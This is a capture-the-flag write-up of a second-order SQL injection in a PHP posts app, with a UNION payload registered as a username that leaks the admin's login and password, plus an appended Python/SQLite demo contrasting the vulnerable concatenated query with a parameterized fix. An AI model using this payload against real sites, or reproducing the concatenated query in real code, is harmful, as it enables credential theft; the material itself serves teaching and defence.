Tags: web 

Rating: 5.0

# Injections

Every parameter in the queries except `$_SESSION['username']` was escaped with `mysqli_real_escape_string`.
This parameter was used for querying all posts of the logged-in user.
When registering a new account it was set to `mysqli_real_escape_string($_POST['uname'])`,
but when logging in it was set to the username read from the database, which is unescaped.

When viewing posts only three values were passed to the HTML though: title, content and author.
The table columns were ordered like this:
```
| id | title | content | date | author |
```
and the query was
```
"SELECT * FROM posts WHERE author = '". $_SESSION['username'] ."
```
so I had to register a new account with the username
```
' UNION SELECT 1, password, login, 4, 5 where role=1 -- asdf
```
When registered, `$_SESSION['username']` was set to the escaped value of the username,
so I had to log out and log in again. Then it was set to the unescaped value; clicking on view posts,
the username and password of the admin showed up, yay -
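To make the second-order flow concrete, here is an added example (not the challenge's own code) that models the register/login/view-posts path in Python with SQLite, with the vulnerable string-concatenated query next to its parameterized fix. The `users` table with a `role` column is an assumption about the backend, and `FROM users` is added to the writeup's payload so it parses; all rows are constructed.

```python
import sqlite3

# Constructed schema mirroring the writeup's posts table (id, title, content, date, author);
# the users table and its role column are an assumption about the challenge backend.
def setup():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, login TEXT, password TEXT, role INTEGER);
        CREATE TABLE posts(id INTEGER PRIMARY KEY, title TEXT, content TEXT, date TEXT, author TEXT);
        INSERT INTO users(login, password, role) VALUES ('admin', 'constructed-admin-secret', 1);
        INSERT INTO posts(title, content, date, author) VALUES ('hi', 'first post', '2020-01-01', 'alice');
    """)
    return db

def register(db, uname):
    # Escaping (here: a bound parameter) protects this INSERT only; the stored value is the raw string.
    db.execute("INSERT INTO users(login, password, role) VALUES (?, ?, 0)", (uname, "pw"))

def login(db, uname):
    # The session username is read back from the database, unescaped, exactly as in the writeup.
    return db.execute("SELECT login FROM users WHERE login = ?", (uname,)).fetchone()[0]

def view_posts_vulnerable(db, session_username):
    # Second-order injection: the stored name is concatenated into a fresh query.
    return db.execute("SELECT * FROM posts WHERE author = '" + session_username + "'").fetchall()

def view_posts_fixed(db, session_username):
    # Hardened form: a bound parameter keeps the name as data no matter where it came from.
    return db.execute("SELECT * FROM posts WHERE author = ?", (session_username,)).fetchall()

# The writeup's payload, with FROM users added (assumed table name) so it parses in SQLite.
PAYLOAD = "' UNION SELECT 1, password, login, 4, 5 FROM users where role=1 -- asdf"

def demo():
    db = setup()
    register(db, PAYLOAD)                 # escaped on the way in, stored raw
    session_username = login(db, PAYLOAD) # read back unescaped into the "session"
    return {
        "vulnerable": view_posts_vulnerable(db, session_username),  # leaks the admin row
        "fixed": view_posts_fixed(db, session_username),            # no posts by that author
        "alice_fixed": view_posts_fixed(db, "alice"),               # normal users still work
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The leaked row lands in the title/content/author positions (columns 2, 3 and 5), which is why the writeup's payload places `password` and `login` where it does.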